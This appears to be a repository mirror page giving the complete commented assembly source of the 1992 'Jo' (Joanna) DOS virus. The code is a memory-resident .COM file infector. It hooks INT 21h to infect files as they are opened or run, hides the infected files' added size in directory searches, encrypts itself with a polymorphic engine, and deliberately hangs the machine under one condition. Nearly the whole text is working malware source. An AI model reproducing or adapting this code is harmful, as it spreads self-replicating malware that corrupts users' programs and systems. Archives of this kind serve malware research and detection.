mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
430 lines
19 KiB
NASM
430 lines
19 KiB
NASM
NAME Jo
|
||
PAGE 55,132
|
||
TITLE Jo Virus.
|
||
|
||
;
|
||
; This is Yet another virus from the ARCV, this one is called
|
||
; Joanna, it was written by Apache Warrior, ARCV President.
|
||
;
|
||
; It has Stealth features, it is a Resident infector of .COM files
|
||
; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
|
||
; its Polymorphic features. There is a maximum of 3 unchanged bytes
|
||
; in the Encrypted code.
|
||
;
|
||
|
||
.model tiny
|
||
|
||
code segment
|
||
|
||
ASSUME CS:CODE,DS:CODE,ES:CODE
|
||
|
||
int_21ofs equ 84h
|
||
int_21seg equ 86h
|
||
length equ offset handle-offset main
|
||
msglen equ offset oldstart-offset msg
|
||
tsrlen equ (offset findat-offset main)/10
|
||
len equ offset handle-offset main
|
||
virlen equ (offset string-offset main2)/2
|
||
decryptlen equ offset main2-offset main
|
||
|
||
org 100h
|
||
|
||
start: jmp main
|
||
db 0,0,0
|
||
|
||
main: mov si,offset main2 ; SI offset for decrypt
|
||
mov cx,virlen ; viri decrypt size
|
||
loop_1:
|
||
db 2eh,81h,2ch ; decrypt
|
||
switch: dw 0
|
||
add si,02h
|
||
dec cx
|
||
jnz loop_1
|
||
main2: call findoff ; find file ofset
|
||
findoff: pop si ;
|
||
sub si,offset findoff
|
||
push ds
|
||
push es
|
||
push cs
|
||
pop ds
|
||
push cs
|
||
pop es
|
||
mov ax,0ff05h ; Test for Scythe2 Boot
|
||
int 13h
|
||
cmp ah,0e9h ; Check for Scythe2 Boot
|
||
jnz haha ; no go on
|
||
mov ah,09h ; Display message
|
||
lea dx,[si+offset msg2]
|
||
int 21h
|
||
jmp $ ; Crash the machine
|
||
haha: mov ah,2ah ; Date Test
|
||
int 21h ;
|
||
cmp dx,1210h ; Is month the Oct.
|
||
jnz main3 ; no go on
|
||
mov ah,09h ; Display Message
|
||
lea dx,[si+offset msg]
|
||
int 21h
|
||
|
||
|
||
main3: mov di,0100h ; move old programs
|
||
push si ; start back to the start
|
||
mov ax,offset oldstart ;
|
||
add si,ax ;
|
||
mov cx,05h ;
|
||
cld ;
|
||
repz movsb ;
|
||
|
||
inst: mov ax,0ffa4h ; check to see if already instaled
|
||
int 21h
|
||
pop si ; bring back si
|
||
cmp ax,42a1h
|
||
je oldprog ; Yes return to old program
|
||
|
||
tt2: xor ax,ax ; Residency Routine
|
||
push ax
|
||
mov ax,ds ; Get MCB segment Address
|
||
dec ax ;
|
||
mov es,ax ; Put MCB segment Address in es
|
||
pop ds ;
|
||
mov ax,word ptr ds:int_21ofs ; Load Int 21h address data
|
||
mov cx,word ptr ds:int_21seg ;
|
||
mov word ptr cs:[si+int21],ax ; Move Int 21h data to store
|
||
mov word ptr cs:[si+int21+2],cx ;
|
||
cmp byte ptr es:[0],5ah ; Check for Start of MCB
|
||
jne oldprog ; If no then quit
|
||
mov ax,es:[3] ; Play with MCB to get top of
|
||
sub ax,0bch ; Memory and reserve 3,008 bytes
|
||
jb oldprog ; for Virus
|
||
mov es:[3],ax ;
|
||
sub word ptr es:[12h],0bch ;
|
||
mov es,es:[12h] ;
|
||
push ds ;
|
||
push cs ;
|
||
pop ds ; Move Virus into Memory
|
||
mov di,0100h ; space allocated above
|
||
mov cx,len+5 ;
|
||
push si ;
|
||
add si,0100h ;
|
||
rep movsb ;
|
||
pop si
|
||
pop ds
|
||
cli ; Stop Interrupts Very Inportant
|
||
mov ax,offset new21 ; Load New Int 21h handler
|
||
mov word ptr ds:int_21ofs,ax ; address and store
|
||
mov word ptr ds:int_21seg,es ;
|
||
sti ;
|
||
|
||
oldprog:
|
||
mov di,0100h ; Return to Orginal
|
||
pop es ; Program..
|
||
pop ds ;
|
||
push di ;
|
||
ret ;
|
||
|
||
int21 dd 0h ; Storage For Int 21h Address
|
||
|
||
;
|
||
; New interupt 21h Handler
|
||
;
|
||
|
||
sayitis: mov ax,42a1h ; Install Check..
|
||
iret
|
||
|
||
new21: ;nop ; Sign byte
|
||
cmp ax,0ffa4h ; Instalation Check
|
||
je sayitis
|
||
cmp ah,11h ; FCB Search file
|
||
je adjust_FCB
|
||
cmp ah,12h ; FCB Search Again
|
||
je adjust_FCB
|
||
cmp ah,4eh ; Handle Search file
|
||
je adjust_FCB
|
||
cmp ah,4fh ; Handle Search Again
|
||
je adjust_FCB
|
||
cmp ah,3dh ; Are they opening a file?
|
||
je intgo ; if no ignore
|
||
cmp ah,4bh ; Exec Function
|
||
jne noint
|
||
intgo: push ax ; 4bh, 3dh Infect file
|
||
push bx ; Handler save the Registers
|
||
push cx
|
||
push es
|
||
push si
|
||
push di
|
||
push dx
|
||
push ds
|
||
call checkit ; Call infect routine
|
||
pop ds
|
||
pop dx
|
||
pop di
|
||
pop si
|
||
pop es
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
noint: jmp cs:[int21] ; Return to Orginal Int 21h
|
||
|
||
adjust_FCB: push es ; Stealth Routine
|
||
push bx
|
||
push si
|
||
push ax
|
||
xor si,si
|
||
and ah,40h ; Check for handle Search
|
||
jz okFCB
|
||
mov si,1 ; Set flag
|
||
okFCB: mov ah,2fh ; Get DTA Address
|
||
int 21h
|
||
pop ax ; Restore ax to orginal function
|
||
call i21 ; value call it
|
||
pushf ; save flags
|
||
push ax ; save ax error code
|
||
call adjust ; Call stealth adjust routine
|
||
pop ax ; restore registers
|
||
popf
|
||
pop si
|
||
pop bx
|
||
pop es
|
||
retf 2 ; Return to caller
|
||
|
||
adjust: pushf ; Stealth check routine
|
||
cmp si,0 ; Check flag set earlyer
|
||
je fcb1
|
||
popf
|
||
jc repurn ; Check for Handle Search error
|
||
mov ah,byte ptr es:[bx+16h] ; No error then carry on
|
||
and ah,01ah ; Check stealth stamp
|
||
cmp ah,01ah ;
|
||
jne repurn ;
|
||
sub word ptr es:[bx+1ah],len ; Infected then take the viri size
|
||
repurn: ret ; from file size.
|
||
fcb1: popf ; Same again but for the FCB
|
||
cmp al,0ffh
|
||
je meat_hook
|
||
cmp byte ptr es:[bx],0ffh
|
||
jne xx2
|
||
add bx,7
|
||
xx2: mov ah,byte ptr es:[bx+17h]
|
||
and ah,01ah
|
||
cmp ah,01ah
|
||
jne meat_hook
|
||
sub word ptr es:[bx+1dh],len
|
||
meat_hook: ret
|
||
|
||
com_txt db 'COM',0 ;
|
||
|
||
reset: ; File Attrib routines
|
||
mov cx,20h
|
||
set_back:
|
||
mov al,01h
|
||
find_att:
|
||
mov ah,43h ; Alter file attributes
|
||
i21: pushf
|
||
call cs:[int21]
|
||
exitsub: ret
|
||
|
||
checkit: ; Infect routine
|
||
push es ; Save some more registers
|
||
push ds
|
||
push ds ; Check to see if file is a
|
||
pop es ; .COM file if not then
|
||
push dx ; quit..
|
||
pop di ;
|
||
mov cx,0ffh ; Find '.' in File Name
|
||
mov al,'.' ;
|
||
repnz scasb ;
|
||
push cs ;
|
||
pop ds ;
|
||
mov si,offset com_txt ; Compare with COM extension
|
||
mov cx,3 ;
|
||
rep cmpsb ;
|
||
pop ds ; Restore Reg...
|
||
pop es ;
|
||
jnz exitsub ;
|
||
|
||
foundtype: sub di,06h ; Check for commaND.com
|
||
cmp ds:[di],'DN' ; Quit if found..
|
||
je exitsub ;
|
||
mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
|
||
mov word ptr cs:[nameptr+2],ds ;
|
||
mov al,00h ; Find Attributes of file to infect
|
||
call find_att ;
|
||
jc exitsub ; Error Quit.
|
||
|
||
alteratr: mov cs:[attrib],cx ; Save them
|
||
call reset ; Reset them to normal
|
||
|
||
mov ax,3d02h ; Open file
|
||
call i21
|
||
jc exitsub ; Error Quit
|
||
push cs ; Set DS to CS
|
||
pop ds ;
|
||
mov ds:[handle],ax ; Store handle
|
||
|
||
mov ax,5700h ; Read file time and date
|
||
mov bx,ds:[handle] ;
|
||
call i21 ;
|
||
ke9: mov ds:[date],dx ; Save DX
|
||
or cx,1ah ; Set Stealth Stamp
|
||
mov ds:[time],cx ; Save CX
|
||
|
||
mov ah,3fh ; Read in first 5 bytes
|
||
mov cx,05h ; To save them
|
||
mov dx,offset oldstart ;
|
||
call i21 ;
|
||
closeit: jc close2 ; Error Quit
|
||
|
||
mov ax,4202h ; Move filepointer to end
|
||
mov cx,0ffffh ; -5 bytes offset from end
|
||
mov dx,0fffbh ;
|
||
call i21 ;
|
||
jc close ; Error Quit
|
||
|
||
mov word ptr cs:si_val,ax ; Save File saize for later
|
||
cmp ax,0ea60h ; See if too big
|
||
jae close ; Yes then Quit
|
||
|
||
mov ah,3fh ; Read in last 5 bytes
|
||
mov cx,05h ;
|
||
mov dx,offset tempmem ;
|
||
call i21 ;
|
||
jc close ; Error
|
||
|
||
push cs ; Reset ES to CS
|
||
pop es ;
|
||
mov di,offset tempmem ; Check if Already infected
|
||
mov si,offset string ;
|
||
mov cx,5 ;
|
||
rep cmpsb ;
|
||
jz close ; Yes the Close and Quit
|
||
|
||
zapfile: ; No Infect and Be Damned
|
||
mov ax,word ptr cs:si_val ;
|
||
add ax,2 ;
|
||
push cs ;
|
||
pop ds ;
|
||
mov word ptr ds:[jpover+1],ax ; Setup new jump
|
||
call mut_eng ; Call Mutation Engine
|
||
mov ah,40h ; Save prog to end of file
|
||
mov bx,cs:[handle] ; Load Handle
|
||
mov cx,length ; LENGTH OF PROGRAM****
|
||
call i21 ; Write away
|
||
close2: jc close ; Quit if error
|
||
|
||
push cs ; Reset DS to CS
|
||
pop ds ;
|
||
mov ax,4200h ; Move File pointer to start
|
||
xor cx,cx ; of file
|
||
cwd ; Clever way to XOR DX,DX
|
||
call i21 ;
|
||
jc close ; Error Quit..
|
||
|
||
mov ah,40h ; Save new start
|
||
mov cx,03h ;
|
||
mov dx,offset jpover ;
|
||
call i21 ;
|
||
|
||
close: mov ax,5701h ; Restore Time and Date
|
||
mov bx,ds:[handle] ;
|
||
mov cx,ds:[time] ;
|
||
mov dx,ds:[date] ;
|
||
call i21 ;
|
||
mov ah,3eh ; Close file
|
||
call i21 ;
|
||
exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where
|
||
mov cx,ds:[attrib] ;
|
||
mov ds,word ptr cs:[nameptr+2] ;
|
||
call set_back ;
|
||
ret ; Return to INT 21h Handler
|
||
|
||
|
||
;
|
||
; CyberTech Mutation Engine
|
||
;
|
||
; This is Version Two of the Mutation Engine
|
||
; Unlike others it is very much Virus Specific.. Works
|
||
; Best on Resident Viruses..
|
||
;
|
||
; To Call
|
||
;
|
||
; si_val = File Size
|
||
;
|
||
; Returns
|
||
; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
|
||
; Write From..
|
||
|
||
|
||
mut_eng:
|
||
mov ah,2ch ; Get Time
|
||
call i21 ;
|
||
mov word ptr ds:[switch],dx ; Use Sec./100th counter as key
|
||
mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt
|
||
mov ax,cs:[si_val] ; Get file size
|
||
mov dx,offset main2 ;
|
||
add ax,dx ;
|
||
mov word ptr [main+1],ax ; Store to Decrypt offset
|
||
xor byte ptr [loop_1+2],28h ; Toggle Add/Sub
|
||
xor byte ptr switch2,28h ; "
|
||
push cs ; Reset Segment Regs.
|
||
pop ds ;
|
||
push cs ;
|
||
pop ax ; Find Spare Segment
|
||
sub ax,0bch ; and put in es
|
||
mov es,ax ;
|
||
mov si,offset main ; Move Decrypt function
|
||
mov di,0100h ;
|
||
mov cx,decryptlen ;
|
||
rep movsb ;
|
||
mov si,offset main2 ; Start the code encrypt
|
||
mov cx,virlen ;
|
||
loop_10: lodsw ;
|
||
switch2: add ax,0000 ;
|
||
stosw ;
|
||
loop loop_10 ;
|
||
mov si,offset string ; move ID string to end
|
||
mov cx,5 ; new code
|
||
rep movsb ;
|
||
mov dx,0100h ; Set Registers to encrypted Virus
|
||
push es ; Location
|
||
pop ds ;
|
||
ret ; Return
|
||
|
||
; Data Section, contains Messages etc.
|
||
|
||
|
||
; Little message to the Wife to Be..
|
||
|
||
msg db 'Looking Good Slimline Joanna.',0dh,0ah
|
||
db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
|
||
db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah
|
||
db '$'
|
||
|
||
msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'
|
||
|
||
virus_name db '[JO]',00h, ; Virus Name..
|
||
author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
|
||
filler dd 0h
|
||
|
||
oldstart: mov ax,4c00h ; Orginal program start
|
||
int 21h
|
||
nop
|
||
nop
|
||
|
||
j100h dd 0100h ; Stores for jumps etc
|
||
jpover db 0e9h,00,00h ;
|
||
|
||
string db '65fd3' ; ID String
|
||
|
||
heap: ; This code is not saved
|
||
handle dw 0h
|
||
nameptr dd 0h
|
||
attrib dw 0h
|
||
date dw 0h
|
||
time dw 0h
|
||
tempmem db 10h dup (?)
|
||
findat db 0h
|
||
si_val dw 0h
|
||
|
||
code ends
|
||
|
||
end start
|